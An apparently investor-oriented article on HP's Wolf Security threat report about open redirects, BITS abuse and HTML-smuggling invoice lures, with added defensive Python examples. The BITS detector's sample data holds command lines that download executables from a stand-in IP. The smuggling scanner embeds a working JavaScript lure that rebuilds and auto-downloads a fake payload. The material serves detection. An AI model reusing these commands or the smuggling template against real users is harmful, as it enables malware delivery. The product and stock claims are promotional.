HP Catches Cybercriminals ‘Cat-Phishing’ Users
HP's latest HP Wolf Security Threat Insights Report describes how cybercriminals are using open redirects, Living-off-the-Land (LotL) tactics, and invoice lures to get past security defenses. The report highlights notable campaigns, including the abuse of open redirect vulnerabilities on legitimate websites and the abuse of the Windows Background Intelligent Transfer Service (BITS) to download malware. It underscores how effective these methods are at evading detection, with email attachments and browser downloads the leading infection vectors and at least 12% of email threats bypassing one or more gateway scanners. HP emphasizes a defense-in-depth approach that isolates and contains high-risk activities to reduce the attack surface.
- HP Wolf Security customers have opened over 40 billion email attachments, web pages, and downloaded files with no reported breaches.
- The report provides actionable insights on advanced cyberattack techniques, enhancing organizational defenses.
- HP highlights the necessity of a multi-layered defense strategy, demonstrating industry leadership in cybersecurity.
- The report identifies and explains the increasing sophistication of cyber threats, helping companies stay ahead of attackers.
- At least 12% of email threats bypassed one or more email gateway scanners, indicating vulnerabilities in current defenses.
- Cybercriminals are successfully using Living-off-the-Land techniques, which abuse legitimate system tools rather than custom malware in order to avoid detection.
- Threat actors are leveraging simple tricks like invoice lures to deceive employees, potentially leading to significant financial and data losses.
- The rise in advanced attack methods underscores a challenging environment for maintaining effective cybersecurity.
Insights
The recent findings from HP Wolf Security show that cyberattackers are employing increasingly sophisticated methods to infiltrate organizational systems. One key technique highlighted is the abuse of open redirects: a legitimate site forwards visitors to whatever URL is supplied in a request parameter without validating it, so a phishing link can point at a trusted domain (the one the user and URL-reputation scanners see) and still land the victim on an attacker-controlled page. This is a significant risk because it turns the trust users place in legitimate websites into cover for malicious intent. For retail investors, it is important to recognize that such attacks expose gaps that standard security solutions may not address. Companies like HP that offer threat containment solutions demonstrate their value in this context, bolstering their competitive position in the cybersecurity market.
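To make the open-redirect mechanism concrete, the following is an added example (not code from HP or from the report) of the vulnerable redirect pattern next to a hardened validator. The allow-list, the site root and the candidate URLs are constructed for the example; the validator resolves the supplied value against the site's own origin and then checks the host the browser would actually connect to, which is what defeats the scheme-relative, userinfo and look-alike-domain variants attackers use to keep a trusted domain in the visible link.

```python
from urllib.parse import urljoin, urlsplit

# Hosts this site may redirect to. Constructed for the example; a real service
# would load the allow-list from configuration.
ALLOWED_HOSTS = {"www.example.com", "accounts.example.com"}
SITE_ROOT = "https://www.example.com/"


def vulnerable_redirect_target(next_param: str) -> str:
    """The open-redirect pattern: send the user wherever ?next= says.

    A lure such as https://www.example.com/login?next=https://evil.example/
    shows a trusted domain to the user and to URL scanners, then lands on
    the attacker's page.
    """
    return next_param


def is_safe_redirect(next_param: str) -> bool:
    """Accept next_param only if it resolves to an allowed host over http(s).

    The value is resolved against SITE_ROOT first, so relative paths pass
    while scheme-relative (//evil.example), userinfo (trusted@evil.example),
    look-alike (www.example.com.evil.example) and non-http (javascript:)
    targets are rejected. Backslashes and control characters are rejected
    outright: browsers treat a backslash as "/" in http(s) URLs, strip tabs
    and newlines from URLs, and CR/LF in a Location header enables header
    injection.
    """
    if not next_param:
        return False
    candidate = next_param.strip()
    if not candidate or any(c in candidate for c in "\\\t\r\n\x00"):
        return False
    parts = urlsplit(urljoin(SITE_ROOT, candidate))
    if parts.scheme not in ("http", "https") or parts.hostname is None:
        return False
    # .hostname drops userinfo and port and lower-cases, so the comparison
    # is against the host the browser will actually connect to.
    return parts.hostname in ALLOWED_HOSTS


def safe_redirect_target(next_param: str, fallback: str = SITE_ROOT) -> str:
    """Hardened handler: validated target or a fixed fallback, never raw input."""
    return next_param if is_safe_redirect(next_param) else fallback


if __name__ == "__main__":
    for candidate in ("/dashboard", "https://evil.example/", "//evil.example/",
                      "https://www.example.com@evil.example/", "javascript:alert(1)"):
        print(f"{candidate!r:45} -> {safe_redirect_target(candidate)}")
```

The comparison is an exact host match against a set rather than a prefix or substring test; prefix tests are the usual reason "fixed" redirects remain open to `www.example.com.evil.example`-style hosts.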
Additionally, the use of Living-off-the-Land (LotL) tactics by cybercriminals to abuse legitimate system tools such as the Windows Background Intelligent Transfer Service (BITS) adds another layer of complexity. Because the download is performed by a signed Windows component that administrators and software updaters use every day, detection-based tools struggle to separate the malicious transfer from normal activity without generating disruptive false positives. Such findings highlight the importance of investing in security solutions that can isolate and contain potential threats without disrupting business operations.
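As an added example of what a detection engineer can still do against "Living-off-the-BITS" activity (this is not HP's logic and not from the report), the following Python runs simple hunting rules over constructed process-creation records in the style of Sysmon Event ID 1. The records, the addresses (203.0.113.0/24 is a documentation range) and the file names are invented. The rules flag BITS jobs that fetch from a URL via `bitsadmin` or `Start-BitsTransfer`, and escalate when an executable is written to a user-writable path or when an Office application is the parent, which is where the signal lies given that BITS itself is legitimate.

```python
import re

# Constructed process-creation records (Sysmon Event ID 1 style fields).
# Invented for this example; 203.0.113.0/24 is a documentation range.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer upd /download /priority foreground "
                    r"http://203.0.113.10/u.dat C:\Users\Public\u.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -nop -w hidden -c "Start-BitsTransfer '
                    r'-Source https://203.0.113.10/inv.pdf.exe -Destination $env:TEMP\inv.exe"',
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /list /allusers",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"svchost.exe -k netsvcs -p -s BITS",
     "ParentImage": r"C:\Windows\System32\services.exe"},
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# bitsadmin verbs that create a job or attach a remote file to one.
BITSADMIN_JOB_RE = re.compile(r"/(transfer|addfile|create)\b", re.IGNORECASE)
# /SetNotifyCmdLine runs a program when the job completes: a persistence/execution trick.
BITSADMIN_NOTIFY_RE = re.compile(r"/setnotifycmdline\b", re.IGNORECASE)
PS_BITS_RE = re.compile(r"Start-BitsTransfer\b.*?-Source\s+[\"']?(https?://[^\s\"']+)",
                        re.IGNORECASE)
EXEC_EXT_RE = re.compile(r"\.(exe|dll|scr|ps1|vbs|js|hta|bat|cmd)\b", re.IGNORECASE)
WRITABLE_DIR_RE = re.compile(r"(\\Users\\|\\ProgramData\\|\\Temp\\|\$env:TEMP|%TEMP%|\\Public\\)",
                             re.IGNORECASE)
OFFICE_PARENT_RE = re.compile(r"\\(WINWORD|EXCEL|POWERPNT|OUTLOOK)\.EXE$", re.IGNORECASE)


def analyze_event(event: dict):
    """Return a finding dict for a suspicious BITS download, or None."""
    image = event.get("Image", "")
    cmd = event.get("CommandLine", "")
    parent = event.get("ParentImage", "")
    reasons = []

    urls = URL_RE.findall(cmd)
    if image.lower().endswith("\\bitsadmin.exe"):
        if BITSADMIN_JOB_RE.search(cmd) and urls:
            reasons.append("bitsadmin job downloading from " + urls[0])
        if BITSADMIN_NOTIFY_RE.search(cmd):
            reasons.append("bitsadmin /SetNotifyCmdLine (runs a command on completion)")
    ps = PS_BITS_RE.search(cmd)
    if ps:
        reasons.append("Start-BitsTransfer from " + ps.group(1))
    if not reasons:
        return None  # plain BITS service activity or read-only bitsadmin use

    # Escalating context: payload dropped where a user can write, or an
    # Office process driving the download (document lure).
    if EXEC_EXT_RE.search(cmd) and WRITABLE_DIR_RE.search(cmd):
        reasons.append("executable written to a user-writable path")
    if OFFICE_PARENT_RE.search(parent):
        reasons.append("spawned by an Office application")
    return {"Image": image, "ParentImage": parent, "reasons": reasons}


def analyze_events(events):
    """Run analyze_event over a batch and keep only the findings."""
    return [f for f in (analyze_event(e) for e in events) if f is not None]


if __name__ == "__main__":
    for finding in analyze_events(SAMPLE_EVENTS):
        print(finding["Image"])
        for reason in finding["reasons"]:
            print("  -", reason)
```

Command-line rules like these miss jobs created through the BITS COM API or from obfuscated PowerShell, so in practice they are paired with the Microsoft-Windows-Bits-Client/Operational event log, which records job creation and transfer events including the remote URL regardless of how the job was created.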
Lastly, the report describes HTML smuggling delivered through invoice lures, a low-cost, low-effort technique that remains highly effective. The malicious payload is carried inside an HTML attachment, typically encoded and reassembled by JavaScript only when the file is opened in the browser, so an email gateway inspecting the attachment sees a web page rather than a recognizable executable. Once the page runs, it reconstructs the payload and starts the infection chain. This is a reminder for investors that even well-worn, low-effort attack vectors pose significant risks if security solutions do not address them.
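The following added example (written for this page, not HP's scanner and not from the report) shows the defensive side of HTML smuggling: a heuristic scanner that looks for the browser-side reassembly pattern (`atob`, `Blob`, `createObjectURL`, a synthetic `download` click, byte loops) and additionally decodes any large base64 literal to check its leading magic bytes. Both sample attachments are constructed, and the "payload" in the lure is a fake blob beginning with the `MZ` marker, not a real executable; the invoice number and file names are invented.

```python
import base64
import re

# Long base64 literal; legitimate pages also carry these (inline images), so
# the decoded magic bytes decide how heavily it weighs.
B64_BLOB_RE = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")

# Script-side indicators of a payload being assembled and handed to the
# browser as a file download.
INDICATORS = {
    "atob": re.compile(r"\batob\s*\("),
    "blob": re.compile(r"\bnew\s+Blob\s*\("),
    "object_url": re.compile(r"createObjectURL\s*\("),
    "ms_save": re.compile(r"msSaveOrOpenBlob"),
    "download_attr": re.compile(r"\.download\s*=|\bdownload\s*=\s*[\"']"),
    "synthetic_click": re.compile(r"\.click\s*\(\s*\)"),
    "byte_loop": re.compile(r"charCodeAt\s*\(|Uint8Array"),
}

MAGIC = {b"MZ": "Windows PE", b"PK\x03\x04": "ZIP/Office", b"%PDF": "PDF", b"\x7fELF": "ELF"}


def decode_embedded_blobs(html: str):
    """Decode every large base64 run and classify it by magic bytes."""
    blobs = []
    for m in B64_BLOB_RE.finditer(html):
        text = m.group(0)
        try:
            raw = base64.b64decode(text + "=" * (-len(text) % 4), validate=True)
        except ValueError:  # includes binascii.Error: not valid base64
            continue
        kind = next((name for magic, name in MAGIC.items() if raw.startswith(magic)), None)
        blobs.append((len(raw), kind))
    return blobs


def scan_html_attachment(html: str) -> dict:
    """Score an HTML attachment; a known file type inside a blob weighs most."""
    indicators = [name for name, rx in INDICATORS.items() if rx.search(html)]
    blobs = decode_embedded_blobs(html)
    score = len(indicators) + sum(3 if kind else 1 for _, kind in blobs)
    verdict = "suspicious" if score >= 3 else "clean"
    return {"indicators": indicators, "blobs": blobs, "score": score, "verdict": verdict}


# Constructed fake payload: an MZ marker followed by filler, not a real PE.
FAKE_PAYLOAD = b"MZ" + bytes(range(256)) + b"\x00" * 100

# Constructed smuggling lure: the payload is reassembled in the browser and
# offered as a download, so the gateway only ever sees an HTML file.
SMUGGLED_HTML = f"""<html><body><h1>Invoice #48213 overdue</h1>
<script>
var b64 = "{base64.b64encode(FAKE_PAYLOAD).decode()}";
var bin = atob(b64); var bytes = new Uint8Array(bin.length);
for (var i = 0; i < bin.length; i++) bytes[i] = bin.charCodeAt(i);
var blob = new Blob([bytes], {{type: "application/octet-stream"}});
var a = document.createElement("a"); a.href = URL.createObjectURL(blob);
a.download = "Invoice_48213.exe"; document.body.appendChild(a); a.click();
</script></body></html>"""

# Constructed benign invoice notification for comparison.
BENIGN_HTML = """<html><body><h1>Invoice #48213</h1><p>Amount due: 1,240.00 EUR</p>
<a href="https://www.example.com/invoices/48213">View online</a></body></html>"""


if __name__ == "__main__":
    for label, doc in (("smuggled", SMUGGLED_HTML), ("benign", BENIGN_HTML)):
        print(label, scan_html_attachment(doc))
```

Real lures routinely defeat this kind of static check by splitting or XOR-encoding the blob, or by smuggling a password-protected ZIP whose contents cannot be inspected, which is why the report's point about containing the browser session rather than relying on the gateway's verdict matters.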
Overall, these insights could positively impact HP’s stock by reinforcing its role as a provider of cutting-edge cybersecurity solutions, potentially driving further adoption of their products.
The HP Wolf Security Threat Insights Report provides useful data on the current threat landscape, which can inform investment decisions in the broader cybersecurity sector. With at least 12% of email threats bypassing one or more gateway scanners, gateway scanning alone is evidently not sufficient against modern threats. This trend suggests growing demand for more robust, integrated security solutions that combine multiple layers of protection.
The fact that the majority of threats come from email attachments (53%) and browser downloads (25%) indicates where organizations need to focus their cybersecurity efforts. Investors should note that companies offering comprehensive email and web security solutions are well-positioned to capture market share. HP’s ability to present concrete data on threat vectors and their effectiveness in mitigating these risks positions them as a leader in the cybersecurity space.
Moreover, HP’s emphasis on threat containment—isolating and containing high-risk activities—demonstrates a proactive approach to security that addresses the limitations of detection-based systems. This approach likely appeals to enterprises seeking to minimize their attack surface and operational disruptions. As the frequency and sophistication of cyberattacks increase, the demand for such advanced security solutions is expected to rise, which could be beneficial for HP’s market position and financial performance.
Invoice lures were the weapon of choice last quarter, while threat actors used Living-off-the-Land techniques to evade detection
PALO ALTO, Calif., May 16, 2024 (GLOBE NEWSWIRE) -- HP Inc. (NYSE: HPQ) today issued its quarterly HP Wolf Security Threat Insights Report, showing attackers are relying on open redirects, overdue invoice lures, and Living-off-the-Land (LotL) techniques to sneak past defences. The report provides an analysis of real-world cyberattacks, helping organizations to keep up with the latest techniques cybercriminals use to evade detection and breach PCs in the fast-changing cybercrime landscape.
Based on data from millions of endpoints running HP Wolf Security, notable campaigns identified by HP threat researchers include:
- Attackers using open redirects to ‘Cat-Phish’ users: In an advanced WikiLoader campaign, attackers exploited open redirect vulnerabilities within websites to circumvent detection. Users were directed to trustworthy sites, often through open redirect vulnerabilities in ad embeddings. They were then redirected to malicious sites – making it almost impossible for users to detect the switch.
- Living-off-the-BITS: Several campaigns abused the Windows Background Intelligent Transfer Service (BITS) – a legitimate mechanism used by programmers and system administrators to download or upload files to web servers and file shares. This LotL technique helped attackers remain undetected by using BITS to download the malicious files.
- Fake invoices leading to HTML smuggling attacks: HP identified threat actors hiding malware inside HTML files posing as delivery invoices which, once opened in a web browser, unleash a chain of events deploying open-source malware, AsyncRAT. Interestingly, the attackers paid little attention to the design of the lure, suggesting the attack was created with only a small investment of time and resources.
Patrick Schläpfer, Principal Threat Researcher in the HP Wolf Security threat research team, comments:
"Targeting companies with invoice lures is one of the oldest tricks in the book, but it can still be very effective and hence lucrative. Employees working in finance departments are used to receiving invoices via email, so they are more likely to open them. If successful, attackers can quickly monetize their access by selling it to cybercriminal brokers, or by deploying ransomware.”
By isolating threats that have evaded detection-based tools – but still allowing malware to detonate safely – HP Wolf Security has specific insight into the latest techniques used by cybercriminals. To date, HP Wolf Security customers have clicked on over 40 billion email attachments, web pages, and downloaded files with no reported breaches.
The report details how cybercriminals continue to diversify attack methods to bypass security policies and detection tools. Other findings include:
- At least 12% of email threats identified by HP Sure Click* bypassed one or more email gateway scanners.
- The top threat vectors in Q1 were email attachments (53%), downloads from browsers (25%) and other infection vectors, such as removable storage – like USB thumb drives – and file shares (22%).
- This quarter, at least 65% of document threats relied on an exploit to execute code, rather than macros.
Dr. Ian Pratt, Global Head of Security for Personal Systems at HP Inc., comments:
"Living-off-the-Land techniques expose the fundamental flaws of relying on detection alone. Because attackers are using legitimate tools, it’s difficult to spot threats without throwing up a lot of disruptive false positives. Threat containment provides protection even when detection fails, preventing malware from exfiltrating or destroying user data or credentials, and preventing attacker persistence. This is why organizations should take a defence-in-depth approach to security, isolating and containing high-risk activities to reduce their attack surface."
HP Wolf Security** runs risky tasks in isolated, hardware-enforced disposable virtual machines running on the endpoint to protect users, without impacting their productivity. It also captures detailed traces of attempted infections. HP’s application isolation technology mitigates threats that slip past other security tools and provides unique insights into intrusion techniques and threat actor behavior.
About the data
This data was gathered from consenting HP Wolf Security customers from January-March 2024.
About HP
HP Inc. (NYSE: HPQ) is a global technology leader and creator of solutions that enable people to bring their ideas to life and connect to the things that matter most. Operating in more than 170 countries, HP delivers a wide range of innovative and sustainable devices, services and subscriptions for personal computing, printing, 3D printing, hybrid work, gaming, and more. For more information, please visit: http://www.hp.com.
About HP Wolf Security
HP Wolf Security is world class endpoint security. HP’s portfolio of hardware-enforced security and endpoint-focused security services are designed to help organizations safeguard PCs, printers, and people from circling cyber predators. HP Wolf Security provides comprehensive endpoint protection and resiliency that starts at the hardware level and extends across software and services. Visit https://hp.com/wolf.
*HP Sure Click Enterprise is sold separately. Supported attachments include Microsoft Office (Word, Excel, PowerPoint) and PDF files, when Microsoft Office or Adobe Acrobat are installed. For full system requirements for HP Sure Access Enterprise and HP Sure Click Enterprise, please visit: https://enterprisesecurity.hp.com/s/article/System-Requirements-for-HP-Sure-Access-Enterprise
**HP Wolf Security for Business requires Windows 10 or 11 Pro and higher, includes various HP security features and is available on HP Pro, Elite, RPOS and Workstation products. See product details for included security features.